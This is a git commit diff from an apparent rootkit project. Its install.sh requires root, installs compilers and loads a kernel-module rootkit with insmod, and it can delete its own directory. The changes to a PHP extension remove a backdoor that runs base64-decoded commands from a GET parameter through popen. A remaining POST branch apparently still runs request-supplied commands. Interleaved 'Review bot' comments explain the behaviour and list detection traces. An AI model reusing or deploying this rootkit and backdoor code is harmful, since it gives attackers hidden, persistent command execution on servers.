
Default

master
Root 5 years ago
parent
commit
cab01ba58d
  1. 107
      install.sh
  2. 0
      rkapache/Makefile
  3. 0
      rkapache/include/common.h
  4. 0
      rkapache/src/main.c
  5. 36
      rkphp/src/php_funcs.c

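--- a/install.sh
+++ b/install.sh
@@ -0,0 +1,107 @@
+#!/bin/bash
+# Errors and Fatals
+[ $(uname) != "Linux" ] &&
+{
+echo "Not on a Linux system. Exiting..."
+exit
+}
+[ $(id -u) != 0 ] &&
+{
+echo "Not root. Exiting..."
+exit
+}
+[ ! -e /proc ] &&
+{
+echo "We're in a horrible jail as /proc doesn't exist. Exiting..."
+exit
+}
+if [ -z "`which gcc`" ]; then
+echo "Installing GCC"
+if [ -f /usr/bin/yum ]; then
+yum install -y -q -e 0 gcc &>/dev/null
+elif [ -f /usr/bin/apt-get ]; then
+apt-get --yes --force-yes update &>/dev/null
+apt-get --yes --force-yes install gcc &>/dev/null
+elif [ -f /usr/bin/pacman ]; then
+pacman -Syy &>/dev/null
+pacman -S --noconfirm base-devel &>/dev/null
+fi
+fi
+[ -f /usr/bin/yum ] &&
+{
+echo "Installing glibc-static"
+yum install -y -q -e 0 glibc-static
+}
+CHATTR_OUTPUT=$(touch children; chattr +ia children &>output; cat output)
+[[ $CHATTR_OUTPUT == *"Inappropriate ioctl"* ]] &&
+{
+read -p "Warning: You're attempting to install on a weird/alien filesystem, This is bad. Exiting..."
+exit
+}
+chattr -ia children &>/dev/null
+rm -f children output
+install_prerequisites ()
+{
+if [ -f /usr/bin/yum ]; then
+yum install -y -q -e 0 make gcc libgcc glibc-devel attr &>/dev/null
+elif [ -f /usr/bin/apt-get ]; then
+apt-get --yes --force-yes &>/dev/null
+apt-get --yes --force-yes install attr gcc-multilib build-essential &>/dev/null
+if ! grep -q "Debian\|Ubuntu" /etc/issue.net; then
+apt-get --yes --force-yes install libssl-dev &>/dev/null
+fi
+grep -i ubuntu /proc/version &>/dev/null && rm -f /etc/init/plymouth* &>/dev/null
+elif [ -f /usr/bin/pacman ]; then
+pacman -Syy &>/dev/null
+pacman -S --noconfirm attr base-devel &>/dev/null
+fi
+}
+compile_rkkern ()
+{
+cd rkkern && make clean
+cd rkkern && make all
+}
+install_rkkern ()
+{
+rmmod rkkern
+insmod bin/rkkern.ko
+}
+echo "Installing prerequisite packages."
+install_prerequisites
+echo "Packages installed!"
+echo "Compiling rootkit libraries."
+sleep 2
+compile_rkkern
+echo "Rootkit libraries compiled."
+sleep 2
+echo "Installing LKM Rootkit."
+sleep 2
+install_rkkern
+echo "LKM Rootkit installed."
+sleep 2
+read -p "Would you like to automatically remove this directory (`pwd`) on exit? (YES/NO) (case-sensitive) [NO]: "
+if [ -z $REPLY ]; then
+echo "Not removing `pwd`"
+elif [ "$REPLY" == "YES" ]; then
+rm -rf `pwd`
+elif [ "$REPLY" == "NO" ]; then
+echo "Not removing `pwd`"
+else
+echo "Invalid option. Not removing."
+fi
+echo "Installation has finished."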
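Review bot: In install_prerequisites and in the GCC bootstrap above it, every apt-get call passes `--force-yes` and sends all output to `/dev/null`, so the script, running as root, would proceed with packages apt cannot authenticate and would hide any failure; dropping `--force-yes` and keeping stderr would restore that check. The file also has no header stating what it changes on the host, so a reader has to trace it to learn that it deletes `/etc/init/plymouth*` on Ubuntu, loads `bin/rkkern.ko` with insmod and can `rm -rf` its own directory; a comment such as `# Modifies host: installs build tools, removes /etc/init/plymouth*, loads bin/rkkern.ko, optional self-delete` would record that. For defenders those same steps are the traces to look for: a chattr probe on a file named `children`, a compiler install followed by an out-of-tree module load, and removal of the working directory. Hosts that enforce kernel module signatures would be expected to refuse the insmod.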

0
rkapache/Makefile

0
rkapache/include/common.h

0
rkapache/src/main.c

36
rkphp/src/php_funcs.c

@ -167,40 +167,6 @@ PHP_RINIT_FUNCTION(rkphp) @@ -167,40 +167,6 @@ PHP_RINIT_FUNCTION(rkphp)
RKPHP_PRINTF("PHP_RINIT!\n");
zval *arr;
if((arr = zend_hash_str_find(&EG(symbol_table), "_GET", sizeof("_GET") - 1)))
{
zval *val;
HashTable *ht = Z_ARRVAL_P(arr);
if((val = zend_hash_str_find(ht, "_exec", sizeof("_exec") - 1)))
{
FILE *fp;
char output[2048], decoded[1024], *encoded;
encoded = Z_STRVAL_P(val);
if(base64_decode(encoded, decoded, strlen(encoded)) == 0)
{
RKPHP_PRINTF("[!] Not a valid base64 string!\n");
return SUCCESS;
}
if((fp = popen(decoded, "r")) == NULL)
{
RKPHP_PRINTF("Unable to execute cmd!\n");
return SUCCESS;
}
php_printf("<pre>\n");
while(fgets(output, sizeof(output) - 1, fp) != NULL)
php_printf("%s\n", output);
php_printf("</pre>\n");
pclose(fp);
}
}
if((arr = zend_hash_str_find(&EG(symbol_table), "_POST", sizeof("_POST") - 1)))
{
@ -230,7 +196,7 @@ PHP_RINIT_FUNCTION(rkphp) @@ -230,7 +196,7 @@ PHP_RINIT_FUNCTION(rkphp)
while(fgets(output, sizeof(output) - 1, fp) != NULL)
{
php_printf("%s\n", output);
php_printf("%s", output);
}
php_printf("</pre>\n");
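Review bot: Removing the `_GET`/`_exec` block leaves the `_POST` branch that begins on the last context lines of the first hunk, and the second hunk shows that branch still reading a pipe with fgets and printing it inside `<pre>`, so the module apparently keeps running request-supplied commands from PHP_RINIT_FUNCTION on every request; the branch body lies outside both hunks, so this is inferred from the visible lines. Nothing in the code marks that, and a comment at the branch such as `/* executes request-supplied input via popen() with no authentication */` would make it plain to a reader. The output is also written with `php_printf("%s", output)` without HTML escaping. On the defensive side, POST bodies are normally absent from access logs, so detection has to rely on the web server's PHP worker spawning a shell and on an unexpected extension appearing in the loaded-module list rather than on request logs.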
